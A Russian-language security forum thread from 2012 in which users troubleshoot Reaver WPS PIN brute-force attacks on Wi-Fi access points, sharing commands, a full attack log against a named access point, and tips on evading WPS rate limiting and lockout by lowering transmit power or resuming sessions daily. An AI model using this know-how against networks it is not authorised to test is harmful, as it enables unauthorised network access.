HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #241  
Старый 31.07.2012, 23:09
picat
New Member
Регистрация: 05.06.2012
Сообщений: 61
Провел на форуме:
19780

Репутация: 0
По умолчанию





сигнал от точки это что?

вот данные с airodump'a (его я отключаю во время работы ривера)

 
Ответить с цитированием

  #242  
Старый 31.07.2012, 23:25
H3L1X
Active Member
Регистрация: 10.04.2012
Сообщений: 632
Провел на форуме:
238147

Репутация: 170
По умолчанию

Цитата:
Сообщение от picat  





сигнал от точки это что?

вот данные с airodump'a (его я отключаю во время работы ривера)


Попробуй так:

Код:
reaver -i mon0 -b  -vv -d 0 -S -w
Если будут изменения какие-то - пиши... Пока идей никаких, будем пробовать методом тыка...
 
Ответить с цитированием

  #243  
Старый 31.07.2012, 23:50
picat
New Member
Регистрация: 05.06.2012
Сообщений: 61
Провел на форуме:
19780

Репутация: 0
По умолчанию

Как ты описал

ЗЫ: ща тоже самое попробовал с aireplay - результата нет


Код:
reaver -i mon0 -b 08:86:3B:80:9F:5C -vv -d 0 -S -w Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner  [?] Restore previous session for 08:86:3B:80:9F:5C? [n/Y] y [+] Restored previous session [+] Waiting for beacon from 08:86:3B:80:9F:5C [+] Switching mon0 to channel 1 [+] Associated with 08:86:3B:80:9F:5C (ESSID: belkin.f5c) [+] Trying pin 01845679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response ************************ [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response ************************ [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Sending EAPOL START request [+] Received M3 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Switching mon0 to channel 1 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response ************************ [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response ************************ [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 01845679 [+] Switching mon0 to channel 2 [+] Switching mon0 to channel 3 [+] Switching mon0 to channel 1 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] 1.76% complete @ 2012-07-31 14:44:04 (0 seconds/pin) [+] Trying pin 01845679 [+] Sending EAPOL START request
 
Ответить с цитированием

  #244  
Старый 01.08.2012, 02:16
H3L1X
Active Member
Регистрация: 10.04.2012
Сообщений: 632
Провел на форуме:
238147

Репутация: 170
По умолчанию

picat, тогда можно попробовать искусственно занизить мощность твоего адаптера/найти место, где сигнал будет не такой сильный, да и вообще перебор пойдёт... Иногда нужно банально передвинуть бук на пару десятков сантиметров в сторону, чтобы ривер заработал - СВЧ-диапазон, мать его) Для второго случая можно погулять по дому с буком и найти место, где будет сигнал в районе -65 dBm, а для первого случая попробуй что-то вроде
Код:
iwconfig wlan0 txpower 10
. Поиграй с параметром txpower - он задаёт максимальную выходную мощность беспроводного адаптера. Иногда точка захлёбывается сигналом и уходит в lock, когда сигнал слишком уж рьяный)))

Апдейт: А вообще, перед всем, что я написал в посте выше, попробуй убрать -d 0. Иногда точка не успевает обрабатывать запросы, которыми её заваливает клиентская машинка...
 
Ответить с цитированием

  #245  
Старый 01.08.2012, 02:34
picat
New Member
Регистрация: 05.06.2012
Сообщений: 61
Провел на форуме:
19780

Репутация: 0
По умолчанию

H3L1X, забыл сказать, я txpower ставил Боливийские 30 - возможно причина в этом. Ща попробую по дефолту или даже на 10. Отпишусь, и благодарю за содействие
 
Ответить с цитированием

  #246  
Старый 01.08.2012, 12:24
Stranger@
Познающий
Регистрация: 10.07.2012
Сообщений: 73
Провел на форуме:
16743

Репутация: 0
По умолчанию

Цитата:
Сообщение от wpa2  

Добавил поддержку WPS в скрипт.

Вот описание:

http://wpa2.at.ua/publ/kak_pojmat_handshake/1-1-0-2

Хотя там особо и описывать нечего все делается нажатием двух кнопок.

В общем кому интересно - пробуйте.

Спасибо, Всё легко и просто.Без лишнего мусора.
 
Ответить с цитированием

  #247  
Старый 01.08.2012, 17:15
stelsonik
Banned
Регистрация: 21.11.2011
Сообщений: 51
Провел на форуме:
14632

Репутация: 0
По умолчанию

да ничего там не регулируеться в бэктреке, поставьте iwconfig wlan0 txpower 0 и удивляйтесь что всё работает...
 
Ответить с цитированием

  #248  
Старый 07.08.2012, 13:57
Ghosttt
Новичок
Регистрация: 29.12.2007
Сообщений: 16
Провел на форуме:
275492

Репутация: 10
По умолчанию

Может кто помочь

Когда сканирую точки выдает, 3 сети, из них все 3 WPS locked ( NO )

Начинаю взлом первой TP-link_FRESH, проверяет 6 пинов, дале появляется

[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

ну и так без конца дето на сутку.

Если в ето время включить мониторинг то уже показывает



тоесть WPS locked с NO меняется на YES, через сутку обратно.

Что делать ?
 
Ответить с цитированием

  #249  
Старый 07.08.2012, 15:35
kosmaty
Участник форума
Регистрация: 26.09.2011
Сообщений: 292
Провел на форуме:
99610

Репутация: 27
По умолчанию

А ничего. Раз в сутки запускать ривер, продолжать сохраненную сессию, шажок за шажком.... У самого таких 2 точки - ч-з 10 пинов точки уходят в лок.
 
Ответить с цитированием

  #250  
Старый 08.08.2012, 11:22
fox.fox
New Member
Регистрация: 16.03.2012
Сообщений: 31
Провел на форуме:
7967

Репутация: 0
По умолчанию

Цитата:
Сообщение от kosmaty  

А ничего. Раз в сутки запускать ривер, продолжать сохраненную сессию, шажок за шажком.... У самого таких 2 точки - ч-з 10 пинов точки уходят в лок.

бывает и такое, только я после горького опыта стал записывать последний пин на бумаге, в случае не возможности продолжения сессии вбивал продолжение по маске.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.